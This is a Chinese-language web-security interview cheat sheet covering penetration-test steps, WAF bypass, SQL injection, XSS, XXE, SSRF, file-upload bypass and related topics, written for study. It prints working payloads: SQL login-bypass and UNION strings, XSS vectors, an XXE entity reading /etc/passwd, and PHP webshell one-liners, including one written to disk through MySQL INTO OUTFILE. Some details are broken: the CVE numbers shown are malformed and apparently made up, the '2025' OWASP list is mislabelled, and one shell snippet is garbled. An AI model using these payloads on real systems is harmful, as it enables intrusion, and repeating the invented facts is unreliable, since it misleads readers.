安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
1、渗透测试简要流程 2、绕过WAF常用方法 3、SQL注入常见Payload 4、XSS种类、弹窗函数、绕过方法 5、XXE漏洞原理 6、列举OWASP TOP10 7、SQL注入常用函数 8、.XSS和CSRF的区别 9、常见的中间件 10、文件上传怎么绕过 11、反序列化的原理 12、数据库预处理怎么突破 13、httponly 14、SQL注入如何拿GetShel 15、oracle、mysql、sqlserver默认端口 16、SSRF 17、常见Web安全漏洞 18、MYSQL注入5.0以上和5.0以下有什么区别 19、get传参和post传参的区别
📌 一、渗透测试简要流程
mermaid
graph TB A[信息收集] --> B[漏洞扫描] B --> C[漏洞利用] C --> D[权限提升] D --> E[横向移动] E --> F[痕迹清除] F --> G[报告撰写]
关键工具:Nessus(扫描)、BurpSuite(渗透)、Cobalt Strike(后渗透)
️ 二、WAF绕过方法
类型 方法 示例 编码绕过 十六进制/Unicode编码 SELECT
→\x53\x45\x4C\x45\x43\x54
注释干扰 内联注释分割关键字 SEL/**/ECT
大小写变形 混合大小写 SeLeCt
溢出攻击 超长请求突破规则引擎 10,000+字符的SQL语句
💉 三、SQL注入Payload示例
万能登录:
sql
' OR 1=1-- admin'--
数据提取:
sql
UNION SELECT user(),database(),version()--
文件读取:
sql
LOAD_FILE('/etc/passwd')
四、XSS攻防体系
种类对比:
类型 触发方式 弹窗函数 反射型 URL参数注入 alert(1)
存储型 数据库持久化 prompt()
DOM型 前端脚本解析 confirm()
绕过方法:
javascript
<img/src=1 onerror=alert(1)> // 标签属性分割 <svg><script>alert(1)</script> // HTML实体编码
📦 五、XXE漏洞原理
攻击流程:
xml
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <user>&xxe;</user> <!-- 读取敏感文件 -->
危害:
- 读取服务器文件
- SSRF内网探测
- 拒绝服务攻击
🚨 六、OWASP TOP 10(2025版)
- 注入攻击(SQL/NoSQL/命令)
- 失效的身份认证
- 敏感数据泄露
- XML外部实体注入(XXE)
- 失效的访问控制
- 安全配置错误
- 跨站脚本(XSS)
- 不安全反序列化
- 使用含漏洞组件
- 日志与监控不足
🔧 七、SQL注入常用函数
数据库 信息获取 文件操作 MySQL user()
version()
LOAD_FILE()
Oracle SYS_CONTEXT()
UTL_FILE
SQL Server SYSTEM_USER
xp_cmdshell
🎭 八、XSS与CSRF区别
mermaid
graph LR A[XSS] -->|目标| B[窃取用户数据] A -->|手法| C[客户端脚本注入] D[CSRF] -->|目标| E[冒充用户操作] D -->|手法| F[伪造请求]
本质差异:
- XSS利用用户对站点的信任
- CSRF利用站点对浏览器的信任
🖥️ 九、常见中间件漏洞
中间件 高危漏洞 Apache 路径穿越(CVE-2025-020) Nginx 解析漏洞(CVE-2025-035) Tomcat WAR后门部署 IIS 短文件名泄露
📤 十、文件上传绕过技巧
- 前端绕过:
- 修改JS验证代码
- BurpSuite拦截改包
- 内容检测绕过:
bas
cat shell.jpg; echo '<?php system($_GET[cmd]);?>' > shell.php
- 解析漏洞利用:
- Apache:
shell.php.jpg
- IIS:
shell.asp;.jpg
⚙️ 十一、反序列化漏洞原理
攻击链:
plaintext
恶意序列化数据 → 应用反序列化 → 触发危险方法(如Runtime.exec )
高危场景:
- Java:
readObject()
+InvokerTransformer
- PHP:
unserialize()
+__destruct()
十二、数据库预处理突破
非常规攻击面:
- 二次注入:
sql
-- 步骤1:存入恶意数据 → admin'-- -- 步骤2:预处理查询 → SELECT * FROM users WHERE id='admin'-- '
- 非查询语句:
python
cursor.execute(f"UPDATE table SET value={user_input}") # 拼接非查询字段
🔒 十三、HttpOnly防护机制
作用:
http
Set-Cookie: session=abc123; HttpOnly; Secure
- ✅ 禁止JS访问:
document.cookie
无法读取- ❌ 局限性:
- 不防御CSRF
- 不防止网络嗅探
💻 十四、SQL注入GetShell方法
MySQL示例:
sql
SELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE '/var/www/shell.php';
前提条件:
- FILE权限(需root账户)
- secure_file_priv未限制
- Web目录可写
🔌 十五、数据库默认端口
数据库 默认端口 协议 MySQL 3306 TCP Oracle 1521 TNS SQL Server 1433 TDS PostgreSQL 5432 TCP
🌐 十六、SSRF漏洞利用
攻击面扩展:
mermaid
graph LR A[外部请求] --> B[云元数据] A --> C[内网服务] A --> D[敏感协议]
高危协议:
gopher://
:攻击Redisfile://
:读取本地文件dict://
:端口扫描
十七、Web安全漏洞TOP5
- SQL注入:数据库操纵
- XSS:客户端攻击
- CSRF:身份劫持
- SSRF:内网渗透跳板
- RCE:远程代码执行
🔄 十八、MySQL注入版本差异
特性 5.0以下 5.0以上 系统表 无information_schema 完整系统表支持 盲注效率 依赖暴力猜解 基于系统表精准查询 文件操作 受限 LOAD_FILE()/INTO OUTFILE
📮 十九、GET与POST传参区别
维度 GET请求 POST请求 位置 URL可见 请求体隐藏 长度 受URL长度限制(~2KB) 无限制 安全性 历史记录可查 相对安全 幂等性 幂等(可缓存) 非幂等(不可缓存)